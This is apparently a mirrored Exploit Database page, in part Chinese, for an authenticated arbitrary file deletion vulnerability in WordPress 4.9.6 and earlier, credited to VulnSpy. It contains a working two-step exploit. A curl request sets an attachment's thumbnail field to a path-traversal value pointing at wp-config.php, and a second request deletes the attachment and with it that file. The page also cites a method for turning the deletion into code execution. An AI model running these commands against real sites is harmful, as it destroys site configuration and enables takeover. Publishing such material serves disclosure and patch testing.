WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion

• Exploit Database
• 115 阅读

• 作者： VulnSpy
  日期： 2018-06-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44949/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # Exploit Title: WordPress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: http://www.wordpress.org # Software Link: http://www.wordpress.org/download # Version: <= 4.9.6 # Tested on: php7 mysql5 # CVE :   Step 1: </code><code> curl -v &apos;http://localhost/wp-admin/post.php?post=4&apos; -H &apos;Cookie: ***&apos; -d &apos;action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php&apos; </code><code> Step 2: </code><code> curl -v &apos;http://localhost/wp-admin/post.php?post=4&apos; -H &apos;Cookie: ***&apos; -d &apos;action=delete&_wpnonce=***&apos; </code><code> REF: WordPress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/